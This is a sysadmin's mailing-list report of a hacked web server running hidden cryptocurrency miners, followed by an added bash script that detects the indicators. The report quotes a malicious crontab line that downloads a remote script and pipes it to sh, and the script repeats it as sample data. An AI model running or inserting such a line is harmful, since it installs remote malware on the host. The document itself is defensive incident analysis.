Good day. I can't seem to find where to submit potential problems to rkhunter, so hopefully the powers that be are listening and will take into consideration what I found.
This morning, on one of the servers we manage, when we ran top we saw the following two processes:

 5482 www-data  20   0  149m  44m 2368 S  750  0.6 228:25.51 jhprimeminer
 5513 www-data  20   0  240m 4812 1176 S    8  0.1   1:33.89 minerd

Doing an lsof on the PIDs we get:

root@withheld-web01 /dev # lsof -p 5482
COMMAND     PID     USER   FD   TYPE DEVICE  SIZE/OFF      NODE NAME
jhprimemi  5482 www-data  cwd    DIR   0,16       160 112483832 /dev/shm/jhPrimeminer-master
jhprimemi  5482 www-data  rtd    DIR  253,0      4096         2 /
jhprimemi  5482 www-data  txt    REG   0,16    214680 112484110 /dev/shm/jhPrimeminer-master/jhprimeminer
jhprimemi  5482 www-data  mem    REG  253,0     80712    134494 /lib/libresolv-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,0     22928    131398 /lib/libnss_dns-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,0     51728    131139 /lib/libnss_files-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,2     93936    394581 /usr/lib/libz.so.1.2.3.4
jhprimemi  5482 www-data  mem    REG  253,0     14696    131151 /lib/libdl-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,0   1437064    134496 /lib/libc-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,0    131258    131411 /lib/libpthread-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,0     90504    131467 /lib/libgcc_s.so.1
jhprimemi  5482 www-data  mem    REG  253,0    530736    131165 /lib/libm-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,2   1043976    393286 /usr/lib/libstdc++.so.6.0.13
jhprimemi  5482 www-data  mem    REG  253,0     31744    131137 /lib/librt-2.11.3.so
jhprimemi  5482 www-data  mem    REG  253,2    356608    393543 /usr/lib/libssl.so.0.9.8
jhprimemi  5482 www-data  mem    REG  253,2   1693344    393542 /usr/lib/libcrypto.so.0.9.8
jhprimemi  5482 www-data  mem    REG   0,16     35911 112457085 /dev/shm/lib/libgmpxx.so.4.3.2
jhprimemi  5482 www-data  mem    REG   0,16    531179 112457045 /dev/shm/lib/libgmp.so.10.1.2
jhprimemi  5482 www-data  mem    REG  253,0    128744    131416 /lib/ld-2.11.3.so
jhprimemi  5482 www-data    0r   CHR    1,3       0t0      1180 /dev/null
jhprimemi  5482 www-data    1w   CHR    1,3       0t0      1180 /dev/null
jhprimemi  5482 www-data    2w  FIFO    0,8       0t0 112228026 pipe
jhprimemi  5482 www-data    3r   REG  253,2   5814328    398692 /usr/lib/cgi-bin/php5
jhprimemi  5482 www-data    4u   REG  253,3         0        57 /tmp/.z
jhprimemi  5482 www-data    5u  sock    0,6       0t0 112396829 can't identify protocol
jhprimemi  5482 www-data    6u  sock    0,6       0t0 112523621 can't identify protocol
jhprimemi  5482 www-data    7u  sock    0,6       0t0 112527946 can't identify protocol
jhprimemi  5482 www-data    8u  sock    0,6       0t0 112537877 can't identify protocol
jhprimemi  5482 www-data    9u  sock    0,6       0t0 112547857 can't identify protocol
jhprimemi  5482 www-data   10u  sock    0,6       0t0 113824599 can't identify protocol
jhprimemi  5482 www-data   11u  IPv4 114777055    0t0       TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED)   <---- SEE HERE
jhprimemi  5482 www-data   12u  IPv4 115198218    0t0       TCP WITHHELD:43904->ypool.net:10034 (ESTABLISHED)   <---- SEE HERE
jhprimemi  5482 www-data   23w   REG  253,4       373   1180063 /var/log/newrelic/php_agent.log
jhprimemi  5482 www-data   26u  unix 0xffff88014727e900 0t0 111962415 socket

root@withheld-web01 /dev # lsof -p 5513
COMMAND     PID     USER   FD   TYPE DEVICE  SIZE/OFF      NODE NAME
minerd     5513 www-data  cwd    DIR   0,16       340      4738 /dev/shm
minerd     5513 www-data  rtd    DIR  253,0      4096         2 /
minerd     5513 www-data  txt    REG   0,16    592464 114161054 /dev/shm/minerd
minerd     5513 www-data  mem    REG  253,0     80712    134494 /lib/libresolv-2.11.3.so
minerd     5513 www-data  mem    REG  253,0     22928    131398 /lib/libnss_dns-2.11.3.so
minerd     5513 www-data  mem    REG  253,0     51728    131139 /lib/libnss_files-2.11.3.so
minerd     5513 www-data  mem    REG  253,0   1437064    134496 /lib/libc-2.11.3.so
minerd     5513 www-data  mem    REG  253,0    131258    131411 /lib/libpthread-2.11.3.so
minerd     5513 www-data  mem    REG  253,0     31744    131137 /lib/librt-2.11.3.so
minerd     5513 www-data  mem    REG  253,0    128744    131416 /lib/ld-2.11.3.so
minerd     5513 www-data    0r   CHR    1,3       0t0      1180 /dev/null
minerd     5513 www-data    1w   CHR    1,3       0t0      1180 /dev/null
minerd     5513 www-data    2w  FIFO    0,8       0t0 112228026 pipe
minerd     5513 www-data    3r   REG  253,2   5814328    398692 /usr/lib/cgi-bin/php5
minerd     5513 www-data    4u   REG  253,3         0        57 /tmp/.z
minerd     5513 www-data    5u  sock    0,6       0t0 112396829 can't identify protocol
minerd     5513 www-data    6u  sock    0,6       0t0 112523621 can't identify protocol
minerd     5513 www-data    7u  sock    0,6       0t0 112527946 can't identify protocol
minerd     5513 www-data    8u  sock    0,6       0t0 112537877 can't identify protocol
minerd     5513 www-data    9u  sock    0,6       0t0 112547857 can't identify protocol
minerd     5513 www-data   10u  sock    0,6       0t0 113824599 can't identify protocol
minerd     5513 www-data   11u  IPv4 114777055    0t0       TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED)
minerd     5513 www-data   12u  IPv4 115358897    0t0       TCP WITHHELD:48657->stratum01.hashco.ws:8888 (ESTABLISHED)
minerd     5513 www-data   23w   REG  253,4       373   1180063 /var/log/newrelic/php_agent.log
minerd     5513 www-data   26u  unix 0xffff88014727e900 0t0 111962415 socket

Doing a clamscan, it did not find anything.

Doing an ls on /dev/shm/jhPrimeminer-master and /dev/shm/minerd:

root@withheld-web01 /dev # ls -la /dev/shm/jhPrimeminer-master
total 236K
drwxr-xr-x  3 www-data www-data  160 Nov  3 21:07 .
drwxrwxrwt 10 root     root      340 Nov  4 23:24 ..
-rw-r--r--  1 www-data www-data 2.6K Sep 17 08:22 .gitignore
-rwxr-xr-x  1 www-data www-data 210K Nov  3 21:07 jhprimeminer
-rw-r--r--  1 www-data www-data 1.6K Sep 17 08:22 jhprimeminer.example.conf
-rw-r--r--  1 www-data www-data 2.0K Nov  2 07:05 Makefile
-rw-r--r--  1 www-data www-data  714 Sep 17 08:22 README.md
drwxr-xr-x  3 www-data www-data  100 Sep 17 08:22 src

root@withheld-web01 /dev # ls -la /dev/shm/minerd
-rwxr-xr-x 1 www-data www-data 579K Jul 10 15:55 /dev/shm/minerd

Looking at /dev/shm/jhPrimeminer-master/README.md shows this is the code/project: https://github.com/tandyuk/jhPrimeminer.git

Hopefully this helps the project or someone else out there. Sigh, now to explain to the client.

Regards
Brent

P.S. I just saw in cron:

cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/cron installed on Sun Nov 3 15:21:02 2013)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
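Added example, not part of Brent's mail or of the rkhunter project: a small bash script that turns the three indicators visible in the report above into repeatable checks, namely an executable mapped from /dev/shm or /tmp, an established TCP connection to an IRC or mining-pool port, and a crontab entry that downloads a script and pipes it to sh. The directory list, port list and the trimmed sample input are assumptions chosen to match this one incident, not a vetted IOC list; scan_live_procs() is the only part that touches the running host.

```bash
#!/bin/bash
# Added example (not from the original post or the rkhunter project).
# Turns the indicators in Brent's report into checks over lsof / crontab text.
# Directory and port lists below are assumptions fitted to this incident.

# Legitimate daemons are not installed in tmpfs or world-writable scratch dirs.
SUSPECT_EXEC_DIRS='^/dev/shm/|^/tmp/|^/var/tmp/'

# "ircd" (6667 in /etc/services), 6697 (IRC over TLS) and the two pool ports
# seen in the post. Extend for your environment; this is not a canonical list.
SUSPECT_PORTS='(ircd|6667|6697|10034|8888)$'

# Input: text of `lsof -p PID` (or `lsof`) output.  Output: "PID PATH" for every
# txt (executable image) entry whose path lies under a suspect directory.
flag_tmpfs_exec() {
    printf '%s\n' "$1" | awk -v re="$SUSPECT_EXEC_DIRS" '
        $4 == "txt" && $NF ~ re { print $2, $NF }'
}

# Input: lsof text.  Output: "PID REMOTE" for TCP sockets whose remote endpoint
# ends in a suspect port.  $9 is "LOCAL:port->REMOTE:port" in lsof output.
flag_suspect_tcp() {
    printf '%s\n' "$1" | awk -v re="$SUSPECT_PORTS" '
        $5 == "IPv4" && $8 == "TCP" && $9 ~ re { split($9, a, "->"); print $2, a[2] }'
}

# Input: crontab text.  Output: non-comment lines that fetch with wget/curl and
# then hand the result to sh/bash via ";", "|", "||" or "&&".
flag_cron_downloader() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ { next }
        /(wget|curl)[[:space:]]/ && /(\||;|&&)[[:space:]]*(ba)?sh[[:space:]]/ { print }'
}

# Live check via /proc, no lsof needed: "PID EXE" for processes whose binary
# lives in a suspect directory.  Reading other users' /proc/PID/exe needs root.
scan_live_procs() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /dev/shm/*|/tmp/*|/var/tmp/*) printf '%s %s\n' "${p#/proc/}" "$exe" ;;
        esac
    done
}

# Constructed sample, trimmed from the lsof output in the post plus one benign
# apache2 process as a negative case.
SAMPLE_LSOF='COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
jhprimemi 5482 www-data txt REG 0,16 214680 112484110 /dev/shm/jhPrimeminer-master/jhprimeminer
jhprimemi 5482 www-data mem REG 253,0 1437064 134496 /lib/libc-2.11.3.so
jhprimemi 5482 www-data 11u IPv4 114777055 0t0 TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED)
jhprimemi 5482 www-data 12u IPv4 115198218 0t0 TCP WITHHELD:43904->ypool.net:10034 (ESTABLISHED)
minerd 5513 www-data txt REG 0,16 592464 114161054 /dev/shm/minerd
minerd 5513 www-data 12u IPv4 115358897 0t0 TCP WITHHELD:48657->stratum01.hashco.ws:8888 (ESTABLISHED)
apache2 1234 www-data txt REG 253,2 500000 1 /usr/sbin/apache2
apache2 1234 www-data 5u IPv4 1 0t0 TCP WITHHELD:80->203.0.113.5:51000 (ESTABLISHED)'

# Constructed sample: the www-data crontab from the post plus a benign entry.
SAMPLE_CRON='# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/cron installed on Sun Nov 3 15:21:02 2013)
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
0 4 * * * /usr/local/bin/backup.sh'

echo "== executables running from tmpfs/scratch dirs =="
flag_tmpfs_exec "$SAMPLE_LSOF"
echo "== TCP connections to IRC / pool ports =="
flag_suspect_tcp "$SAMPLE_LSOF"
echo "== crontab download-and-execute lines =="
flag_cron_downloader "$SAMPLE_CRON"
```

On a live host, feed real output instead of the samples, e.g. `flag_tmpfs_exec "$(lsof -nP)"` and `flag_cron_downloader "$(cat /var/spool/cron/crontabs/*)"`, and run `scan_live_procs` as root. Note that the post's lsof shows the miners inherited fd 3 (/usr/lib/cgi-bin/php5) and the newrelic log from their parent, which is why the www-data user and the web stack are the place to look for the initial entry point; these checks only find the running payload.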